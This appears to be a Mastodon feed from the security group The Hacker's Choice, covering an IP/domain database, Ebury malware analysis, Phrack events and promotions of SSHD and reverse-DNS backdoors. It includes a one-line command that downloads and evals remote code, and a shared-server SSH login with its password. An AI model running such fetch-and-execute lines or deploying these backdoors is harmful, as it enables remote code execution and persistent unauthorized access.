The Hacker‘s Choice

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

The Hacker‘s Choicethc@infosec.exchange
2025-12-16

@usbee trough your donations ❤️

The Hacker‘s Choicethc@infosec.exchange
2025-12-16

@elithebearded
Yes. Wildcards may help to hide them a bit longer. We find sub domains by various methods. CT stream is one but also searching other places…or user feedback:

The Hacker‘s Choicethc@infosec.exchange
2025-12-16

@fwaggle on my Ubuntu 22.0 and 24.0 the ed25519 host public key is not in PEM but in the <type> <key> format (no <comment> section).

What distro uses PEM? I can try to convert it to the type-format and see if the daemon blindly accepts it.

The Hacker‘s Choicethc@infosec.exchange
2025-12-16

@freddy it’s sourced by many methods, CT stream is one of the big data inputs (but also where most of the rubbish comes from - which we try to filter out before adding to the database).

The Hacker‘s Choicethc@infosec.exchange
2025-12-16

THC Release 💥: The world’s largest IP<>Domain database: ip.thc.org

All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.

Updated monthly.

Try: curl ip.thc.org/1.1.1.1

Raw data: ip.thc.org/docs/bulk-data-acce

(The fine work of messede 👌)

What does everyone think? Need feedback before release tomorrow :)

The Hacker‘s Choicethc@infosec.exchange
2025-12-14

@lp0_on_fire it will work fine without systemctl. Any way to restart the sshd will work. either by waiting for a reboot or send a SIGTERM.

The Hacker‘s Choicethc@infosec.exchange
2025-12-13

@agowa338 Can't see how rhost is better. rhosts-trick requires the attacker to drop at least 2 new files to the target and change at least 1 line in the sshd_config (HostbasedAuthentication; a line that raises a red flag).

Our trick adds no new file to the system and only needs 1 line to the config (without raising a red flag).

Please explain if I got this wrong.

The Hacker‘s Choicethc@infosec.exchange
2025-12-13

Can anyone test my *SMALLEST* SSHD backdoor?

- Survives updates.
- Does not use ~/.ssh/authorized_keys or PAM modules.
- Does not create any new file.

Just SSHD trickery.

Source at thc.org/tips

The Hacker‘s Choicethc@infosec.exchange
2025-12-02

Stealth died 😢 A member of Team-Teso, Phrack staff, and many other groups. A true hacker—perhaps as true as a hacker can ever be. WE MISS YOU. 🩷

More: thc.org/404

<stealth> we had joy we had fun we had a rootshell on a sun.

The Hacker‘s Choicethc@infosec.exchange
2025-11-21

Ebury Version 1.8.2.e6

Memory dump from live processes now available (sshd and systemd-udev). De-crypted and De-obfuscated. Enjoy.

The Hacker‘s Choicethc@infosec.exchange
2025-11-21

{eval,"$({curl,-SsfL,github.com/hackerschoice/hacks)"}

### hackshell now detects Ebury ###

The Hacker‘s Choicethc@infosec.exchange
2025-11-21

EBury SSHD backdoor?? on 400,000 hosts?

Let's fuck around and find out. (Why +s on the .so file???)

Dissect, understand & ridicule. Join the group effort at thc.org/ops or SSH straight into the server and check ~/ebury:

ssh -o "SetEnv SECRET=lYQkdQHIuQyTJngVtIskqRLx" root@adm.segfault.net (password is 'segfault')

The Hacker‘s Choicethc@infosec.exchange
2025-10-12

INTERVIEW of "MB" WhereWarlocksStayUpLate:

wherewarlocksstayuplate.com/in

You have inspired many. We are fans:⚡️🌊🎠

wherewarlocksstayuplate.com/in

The Hacker‘s Choicethc@infosec.exchange
2025-10-08

🇩🇪 German speaking only: THC member and @phrack staff on @heiseonline about Phrack's 40th, hacking and life in general.

The Hacker‘s Choicethc@infosec.exchange
2025-10-08

Inject LUA scripts into a running Linux Process like a boss, by stealth/team-teso:

c-skills.blogspot.com

The Hacker‘s Choicethc@infosec.exchange
2025-09-23

Friend of ours is testing his PoC to DISABLE XMR mining pools.

Revenge for all those pesty XMR miners installed by script kiddies. Tool destroys the ENTIRE wallet: stopping all xmr-rig miners worldwide (of the same wallet).

Looking for more WALLETs: wallet.hellknight.xyz/walletin

Please help and save a baby seal.

The Hacker‘s Choice boosted:
2025-08-09

PHONY AWARD ceremony at the PHRACK PARTY at @why2025camp hosted by @Emerson @thc and tmp.out

VOTE (by shouting) for the “Biggest Security Facepalm” and more. Legends like Hegseth and Crowdstrike have been nominated and informed.

Winning prize is the privilege to be trolled by us and pay for phrack's next print release :>

PHONY AWARD CEREMONY
hosted by tmp.out - THC - emerson 
Phrack Party @ WHY Camp 
SAT 9th of August, 20:30pm
The Hacker‘s Choice boosted:
2025-06-21

PHRACK is coming to #DEFCON! We're printing ~10,000 zines and giving an hour-long talk you won't want to miss! Stay tuned. 🔥 #40yrsOfPhrack #phrack72

The Hacker‘s Choicethc@infosec.exchange
2025-06-20

Dear UNC5174/China, you have violated THC's Terms & Conditions ("to be used for good purpose and academic research only").

May want to discuss this with your therapist. 🤷‍♂️

sentinelone.com/labs/follow-th

UNC5174 T&C violation
The Hacker‘s Choicethc@infosec.exchange
2025-06-05

Generate your own python-implant of a reverse DNS backdoor. thc.org/tips => 6.vi Smallest reverse DNS-tunnel Backdoor.

python DNS backdoor

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst